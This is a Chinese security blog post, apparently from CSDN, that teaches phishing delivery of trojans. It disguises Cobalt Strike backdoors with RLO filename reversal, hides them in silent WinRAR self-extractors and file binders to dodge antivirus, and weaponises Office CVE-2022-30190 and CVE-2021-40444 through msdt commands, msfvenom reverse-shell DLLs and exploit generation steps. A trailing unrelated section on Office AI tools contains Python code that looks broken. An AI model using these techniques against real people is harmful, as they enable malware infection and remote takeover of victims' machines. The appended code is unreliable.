154-钓鱼篇&Offfice-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑

最新推荐文章于 2024-10-08 19:17:49 发布
最新推荐文章于 2024-10-08 19:17:49 发布
阅读量1.2k 收藏 31
点赞数 16
分类专栏: 红队APT 文章标签: 安全 web安全 系统安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_63855540/article/details/142419574
版权

#知识点:

1、文件名-RLO 伪装-后缀

2、压缩文件-自解压-运行

3、捆绑文件-打包加载-运行

4、Office 套件-漏洞钓鱼-CVE

 

#文件后缀-钓鱼伪装-RLO

cs生成一个exe后门

重命名为一个png反过来或者jpg反过来的名字

然后再g前面输入其他字符在g字符前面右键选择这个插入RLO

然后就会惊奇的发现名字反过来了,以png后缀结尾并且程序任然还是一个exe文件可以正常的上线

 

#压缩文件-自解压-释放执行

压缩两个文件为一个文件

使用到的压缩工具为winrar

WinRAR - 压缩软件 老牌压缩软件知名产品 经典装机软件之一

准备一个正常的exe安装程序,一个木马exe

选择两个exe右键

勾选

点击

填写解压路径,这里就是解压后文件会被解压到这里。

这里就是解压后运行什么东西,我这里选择先运行木马然后运行正常的程序

这里选择隐藏,一般解压不是有个进度条还会显示解压到哪个文件夹下面,选了这个就看不到了

再勾选这两个

然后确定就会生成一个文件,不过还是一个exe文件

可以把这个exe修改为winrar的样子,这样一来无论是外观还是点击后的内容都和winrar做的事情一样了

当然也可以直接把这个exe伪装为zip文件,用前面的RLO方式

点击这个zip直接丝滑上线,并且会自动运行正常的winrar安装包

然后在路径盘可以看到解压的两个文件

不过如果我右键选择解压到还是会自动解压出原本的两个文件,所以我觉得还是不要伪装为zip直接就是伪装为安装包就可以,再zip压缩一下更像了

#捆绑文件-打包加载-释放执行

使用文件捆绑器将两个文件捆绑为一个文件,宿主文件就选正常的winrar,捆绑文件就选木马

工具链接:夸克网盘分享

这个看着和上面那个好像差不多。

修改图标使用工具进行修改,直接拖上去就可以,修改完后可能不会立马变样系统有缓存改个名字就好了

工具链接:夸克网盘分享

有些杀软会对捆绑器进行识别拦截,所以选择捆绑器也是绕过杀软的一个步骤。视频中的另一个捆绑工具:夸克网盘分享

 

#Office 套件-CVE 漏洞-MSF&CS

office套件安装工具以及激活工链接:夸克网盘分享

-Microsoft MSDT CVE-2022-30190 代码执行

GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

该漏洞首次发现在 2022 年 5 月 27 日,由白俄罗斯的一个 IP 地址上传。恶意文档从 Word 远程模板功能从远程 Web 服务器检索 HTML 文件, 通过 ms-msdt MSProtocol URI 方法来执行恶意 PowerShell 代码。感染过程利用 程序 msdt.exe,该程序用于运行各种疑难解答程序包。

此工具的恶意文档无需用户交互即可调用它。导致在宏被禁用的情况下,恶意文档依旧可 以使用 ms-msdt URI 执行任意 PowerShell 代码。

目前已知影响的版本为:

office 2021 Lts

office 2019

office 2016

Office 2013

Office ProPlus

Office 365

项目 GitHub - JohnHammond/msdt-follina: Codebase to generate an msdt-follina payload

使用代码自查是否存在漏洞,如果弹出计算器就是

msdt.exe /id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'YwBhAGwAYwA='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe"

使用工具安装了office套件2019,2021版本在虚拟机上面经过测试都没搞出存在漏洞的情况。所以无法复现了这里

原项目是会下载一个nc然后使用nc反弹,这里我们修改实现下载木马上线,所以需要修改一下内容

先cs生成一个exe的后门

在后门的目录下起个http服务,当然实战中需要在自己的vps来充当服务器

然后修改项目的follina.py的代码,在第111行处修改内容为本机的ip和8088端口,这个项目的实际作用也是在这里下载一个nc然后调用cmd去执行nc进行反弹。

MicroSoft MSHTML CVE-2021-40444 远程代码执行

影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022 等各个主流版本

利用项目 GitHub - lockedbyte/CVE-2021-40444: CVE-2021-40444 PoC

1、安装依赖:

apt-get install lcab(可能有的环境没有安装zip顺便把zip也安装一下后面要用到zip)

2、生成DLL:

msfvenom -p windows/meterpreter/reverse tcp lhost=47.94.236.117 lport=9999 -f dll>shell.dll 使用cs也可以

3、msf开启监听

4、生成文档

将dll放置到CVE的文件夹下面

python3 exploit.py generate shell.dll http://vpsip:10000

5、监听文档

python3 exploit.py host 10000

6、将生成当前文件夹的doc文档取出然后点击上线,msf或cs就会上线,监听10000端口会有访问的浏览数据记录

我这个也没有复现成功,步骤没有问题应该是虚拟机也不存在这个漏洞。。。这个日志中要出现一个word.cab的访问记录就对了

另外这两个CVE无法免杀,因为杀的是漏洞,还有一个CVE的漏洞太老了就没讲了。

 

漏洞复现】泛微-eoffice10-laravel-反序列化
知黑而守白
03-29 592
E-Office是泛微旗下标准协同办公平台,本着简洁易用、高效智能的原则,致力于为企业打造移动互联的无纸化、数字化办公平台。该漏洞主要是由与系统使用的laravel框架存在反序列化漏洞,从而通过构造特殊的数据包,达到命令执行。
OnTheHub 费取得Offfice/Windows 正版序号,学生/教师限定
猫敷雪
08-01 2122
通过OnTheHub,可以费office/windows正版序列号,永久使用。 OnTheHub 是一个 Kivuto 旗下特别为教育机构提供的软体授权平台,教育机构可向OnTheHub 购买授权合约,之后能让校内网域内的使用者皆能申请使用授权,而在微软产品授权方面跟以往校内普遍使用的KMS授权比起来OnTheHub平台为每一个申请者提供的是『零售版序号』,本身的授权方式和目前市面上所能购买的零售授权并无区别,取得后可永久使用。 首先,你的学校需要与微软合作,在OnTheHub上可以找到你的学校名称,这样
钓鱼-利用RLO隐藏exe&文件捆绑&office-远程模板加载上线CS
weixin_45701675的博客
11-26 2079
钓鱼-利用RLO隐藏exe&文件捆绑&office-远程模板加载上线CS
用Winrar打造永不被捆绑
宁不凡的博客
08-25 4193
首先将需要捆绑的图片与程序复制一份到桌面(目的是同目录就行了,不一定要桌面。)   按住键盘的ctrl键,鼠标左键单击选中图片与程序。 如图所示:   然后在任意图标上单击右键,选择如下           (打开自动解压到系统的temp文件夹里,你也可以填写其他路径。)           (这里是文件的ico图标,自己拿图片...
【红队APT】钓鱼&Office-CVE漏洞&RLO隐藏&压缩包释放&打包捆绑
今天是几号的博客
04-22 1841
影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本。导致在宏被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,经过后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图。6、取出文档执行测试。
office CVE-2022-30190 RCE 复现
qq_53058639的博客
12-06 462
简介:当用户点击word等应用程序时,会使用URL协议调用MSDT,随即启动msdt.exe程序造成远程代码执行漏洞。简单来说就是攻击者可以恶意构造一个word文档,诱骗受害者点击,从而导致系统被黑。
Microsoft Office (CVE-2017-11882、CVE-2022-30190) 漏洞复现
oiadkt的博客
04-23 912
Microsoft Office (CVE-2017-11882、CVE-2022-30190) 漏洞复现
only-offfice apk安装包
01-24
only-offfice apk安装包
setuplanguag.x64.zh-cn_.exe
10-19
windows2013版本语言包,直接下载可用,亲测没有问题。安装后登录word,在language选项中选择中文,即更改成功。
Excel2010基础大全(1-66集)视频教程-高清版.zip
03-31
0516-条件格式.mp4 0802-创建图表.mp4 0515-表格.mp4 0102-功能区.mp4 0101-工作环境.mp4 0104-版本兼容性.mp4 0204-复制与粘贴.mp4 0401-格式数字.mp4 0103-后台视图.mp4 0203-选取区域.mp4 0303-输入公式.mp4 ...
基于钓鱼攻击的技术点研究
2401_84466225的博客
06-03 1159
下载安装BAT2EXE,打开该工具,点击open导入前面创建的test.bat,然后将“notepad”添加到test.bat的顶部,点击右侧的icon选择一个txt文本图标。在该网址https://www.sendcloud.net注册一个账号,登录成功后,自带一个域名,也可以配置自己的域名,依次点击发送设置---->新增域名,输入自己的域名后点击配置,如下图所示,这里要在自己的域名处按照系统的要求进行解析配置(未配置前是红色X),域名配置好后,点击检测配置,状态变绿通过检测就可以正常使用了。
钓鱼&文件名反转&office远程模板
qq_50854662的博客
05-29 1817
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关 0x01 件名反转 在渗透过程中,有时需要通过钓鱼来来传播一些木马文件,而这些木马文件需要精心的伪装。RLO即 Start Of Right-to-Left override。我们可以通过选择插入Unicode控制字符RLO来达到反转文件名的效果 以CobaltStrike生成的木马BypassA.
红队apt--windows系统RLO文件类型欺骗(附带钓鱼案例演示)
2302_79590880的博客
10-08 654
RLO文件伪造手法,附带钓鱼案例。
渗透测试 | 30分钟学会网络钓鱼“骚”姿势
yyyyyybw的博客
09-04 1271
网络钓鱼是通过伪造银行或其他知名机构向他人发送垃圾邮件,意图引诱收信人给出敏感信息(如用户名、口令、帐号 ID 、 ATM PIN 码或信用卡详细信息)的一种攻击方式。
TideSec远控学习一(基础+msfvenom隐藏的参数)
fa1lr4in的小博客
02-08 3286
参考链接:https://mp.weixin.qq.com/s/3LZ_cj2gDC1bQATxqBfweg 参考资料 技术有一套:https://anhkgg.com/aanti-virus/ Meterpreter及对抗分析:https://www.freebuf.com/sectool/157122.html 艺术:https://www.4hou.com/technol...
Microsoft Office Word 远程命令执行漏洞(CVE-2022-30190)分析与利用
不忘初心,护天下安全!
06-24 1384
CVE-2022-30190漏洞在2022年5月27日,由nao_sec发现了一个从白俄罗斯IP上传到VirusTotal的恶意Word文档。该文档使用 Microsoft Word 远程模板功能链接恶意 HTML 文件,Winword.exe 程序处理该恶意 HTML 文件中的 js 代码时发现其中使用”ms-msdt”协议的 URL, 随即启动 msdt.exe 程序(Microsoft Support Diagnostics Tool)处理该 URL,导致内嵌在 URL 中的 powershell 命
改变文件后缀顺序
qq_45844442的博客
08-20 443
对于正常的文件而言,文件名后缀是在最后面的.xxx,但是实际上这个顺序是可以修改的,在进行重命名的时候在重命名文本框中点击右键,选择插入unicode字符,我们可以将文件名命名成如下格式gnp.exe,这样在最前面插入unicode字符选择RLO字符,显示方式将倒过来,从而使文件名成了exe.png,这就是为什么有些奇怪的名字但是却执行的是exe。
OFFFICE ai 助手
最新发布
02-14
### Office AI Assistant Tools and Applications AI technology has significantly impacted various industries, including office productivity software. For users seeking enhanced efficiency and automation within Microsoft Office applications, several AI-driven tools have emerged to assist with document creation, data analysis, communication, and more. #### 1. **Microsoft Viva** Viva integrates directly into Microsoft Teams, offering employees access to learning resources, well-being insights, and knowledge management features. This tool leverages AI algorithms to personalize content recommendations based on user behavior patterns and organizational needs[^1]. #### 2. **Power Automate (formerly Flow)** This platform enables users to automate workflows across different apps and services without writing code. By connecting multiple steps together—such as receiving an email trigger followed by updating a spreadsheet record—users can save time while reducing errors associated with manual tasks[^3]. #### 3. **Editor in Word & Outlook** The Editor feature uses natural language processing techniques to provide grammar suggestions beyond simple spell checking. It also offers style improvements tailored specifically towards professional documents like emails or reports sent through Outlook. #### 4. **Forms Pro** With advanced analytics capabilities powered by machine learning models trained on large datasets, Forms Pro allows businesses to gather feedback from customers via surveys efficiently. The system automatically identifies trends over time so organizations can make informed decisions quickly. #### 5. **Translator Add-In for PowerPoint** Enabling real-time translation during presentations ensures effective cross-cultural communications regardless of audience members' native languages spoken. Through integration with Azure Cognitive Services’ Text Translation API, slides containing text will be translated instantly upon selection[^4]. ```python import os from azure.cognitiveservices.language.textanalytics import TextAnalyticsClient from msrest.authentication import CognitiveServicesCredentials def translate_text(text_to_translate): client = TextAnalyticsClient( endpoint=os.getenv('TEXT_ANALYTICS_ENDPOINT'), credentials=CognitiveServicesCredentials(os.getenv('TEXT_ANALYTICS_SUBSCRIPTION_KEY')) ) response = client.detect_language(documents=[text_to_translate]) detected_lang_code = response.documents[0].detected_languages[0].iso6391_name target_language_codes = ['fr', 'es'] # Example targets: French, Spanish translations = [] for lang_code in target_language_codes: result = client.translator.translate( input_texts=[text_to_translate], source_language=detected_lang_code, target_languages=[lang_code] ) translations.append({ "language": lang_code, "translation": result[0].translations[0].text }) return translations ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值